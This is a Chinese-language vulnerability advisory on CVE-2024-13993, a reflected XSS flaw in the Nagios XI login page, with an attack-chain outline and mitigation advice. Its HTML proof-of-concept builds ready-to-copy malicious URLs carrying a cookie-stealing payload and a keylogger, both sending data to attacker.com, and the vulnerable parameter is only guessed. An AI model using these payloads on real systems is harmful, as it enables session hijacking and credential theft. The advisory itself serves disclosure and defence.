CVE-2024-13993: Nagios XI登录页面反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2024-13993

漏洞类型

反射型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Nagios XI

漏洞概述

CVE-2024-13993是Nagios XI中的一个中危反射型跨站脚本(XSS)漏洞。该漏洞存在于Nagios XI的登录页面，由于对用户输入的验证或转义不充分，攻击者可以通过构造恶意链接，在受害者访问时在其浏览器中执行任意JavaScript代码。攻击的成功与否与目标用户使用的浏览器版本密切相关——旧版浏览器更容易受到攻击，而现代浏览器的安全机制可能会阻止部分攻击向量。由于该漏洞影响的是登录页面，任何访问该页面的用户都可能成为潜在受害者。攻击者可以利用此漏洞窃取会话Cookie、进行钓鱼攻击或执行其他恶意操作，对Nagios XI系统的安全性构成威胁。

技术细节

该漏洞是由于Nagios XI登录页面在处理用户输入时缺少适当的输入验证和输出编码所导致的。当用户访问登录页面并携带特定构造的恶意参数时，这些参数值会被直接反射到页面响应中而未经充分转义。攻击者可以通过在URL参数中嵌入恶意JavaScript代码（如<script>alert(document.cookie)</script>），当受害者点击攻击者构造的恶意链接时，浏览器会执行这些恶意代码。由于攻击发生在Nagios XI的域名上下文中，恶意脚本可以访问该域的Cookie、会话信息等敏感数据。值得注意的是，该漏洞主要影响旧版浏览器，因为现代浏览器通常内置了XSS过滤器或防护机制。然而，在企业环境中可能仍存在使用旧版浏览器的终端，因此该漏洞仍具有实际威胁。攻击者通常会结合社会工程学手段，诱骗受害者点击恶意链接。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标Nagios XI版本，确认版本号低于2024R1.1.2，并确定登录页面的URL结构

STEP 2

构造恶意链接

攻击者构造包含XSS payload的恶意URL，将恶意JavaScript代码嵌入到登录页面的参数中（如redirect参数）

STEP 3

社会工程攻击

攻击者通过钓鱼邮件、即时消息或其他渠道诱骗目标用户点击恶意链接

STEP 4

触发漏洞

受害者在旧版浏览器中访问恶意链接，浏览器请求Nagios XI登录页面

STEP 5

XSS执行

服务器将恶意参数未经充分转义地反射回页面响应，旧版浏览器执行嵌入的JavaScript代码

STEP 6

数据窃取/进一步攻击

恶意脚本在受害者浏览器中执行，可窃取Cookie、会话令牌，或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2024-13993 PoC: Reflected XSS via login page -->
<!-- Target: Nagios XI versions < 2024R1.1.2 -->
<!-- Note: This vulnerability primarily affects legacy browsers -->

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2024-13993 PoC</title>
</head>
<body>
    <h1>CVE-2024-13993: Nagios XI Reflected XSS PoC</h1>
    
    <p><strong>Target:</strong> Nagios XI Login Page</p>
    <p><strong>Affected Versions:</strong> < 2024R1.1.2</p>
    <p><strong>Vulnerability Type:</strong> Reflected Cross-Site Scripting (XSS)</p>
    
    <h2>Malicious URL Examples:</h2>
    
    <h3>Example 1: Basic XSS Payload</h3>
    <code id="xss1"></code>
    <button onclick="copyToClipboard('xss1')">Copy URL</button>
    
    <h3>Example 2: Cookie Stealing Payload</h3>
    <code id="xss2"></code>
    <button onclick="copyToClipboard('xss2')">Copy URL</button>
    
    <h3>Example 3: Keylogger Payload</h3>
    <code id="xss3"></code>
    <button onclick="copyToClipboard('xss3')">Copy URL</button>
    
    <h2>Attack Scenario:</h2>
    <ol>
        <li>Attacker identifies a vulnerable Nagios XI installation (< 2024R1.1.2)</li>
        <li>Attacker crafts a malicious URL with XSS payload in login page parameter</li>
        <li>Attacker uses social engineering to trick victim into clicking the link</li>
        <li>Victim uses legacy browser to access the malicious URL</li>
        <li>Malicious JavaScript executes in victim's browser within Nagios XI context</li>
        <li>Attacker steals session cookies or performs actions on behalf of victim</li>
    </ol>
    
    <script>
        // Replace 'TARGET_URL' with actual Nagios XI URL
        const targetUrl = 'TARGET_URL';
        
        // XSS Payloads
        const payload1 = '<script>alert("XSS by CVE-2024-13993")<\/script>';
        const payload2 = '<img src=x onerror="fetch(\'https://attacker.com/steal?c=\'+document.cookie)"> ';
        const payload3 = '<script>document.addEventListener("keypress",function(e){new Image().src="https://attacker.com/log?k="+e.key})<\/script>';
        
        // Construct malicious URLs (assuming vulnerable parameter is 'redirect' or similar)
        const maliciousUrl1 = targetUrl + '/nagiosxi/login.php?redirect=' + encodeURIComponent(payload1);
        const maliciousUrl2 = targetUrl + '/nagiosxi/login.php?redirect=' + encodeURIComponent(payload2);
        const maliciousUrl3 = targetUrl + '/nagiosxi/login.php?redirect=' + encodeURIComponent(payload3);
        
        document.getElementById('xss1').textContent = maliciousUrl1;
        document.getElementById('xss2').textContent = maliciousUrl2;
        document.getElementById('xss3').textContent = maliciousUrl3;
        
        function copyToClipboard(elementId) {
            const text = document.getElementById(elementId).textContent;
            navigator.clipboard.writeText(text);
            alert('URL copied to clipboard!');
        }
    </script>
</body>
</html>

影响范围

Nagios XI < 2024R1.1.2

防御指南

临时缓解措施

由于该漏洞主要影响旧版浏览器，建议用户升级浏览器到最新版本以获得更好的安全防护。同时，企业应强制执行浏览器更新策略，确保所有终端设备使用最新版本的浏览器。对于无法立即升级Nagios XI的情况，可以考虑在WAF（Web应用防火墙）层面添加XSS过滤规则，对登录页面的参数进行检测和拦截。此外，加强员工的安全意识培训，使其能够识别和避免点击可疑链接。对于高风险环境，建议暂时限制使用旧版浏览器访问Nagios XI系统，直到完成版本升级。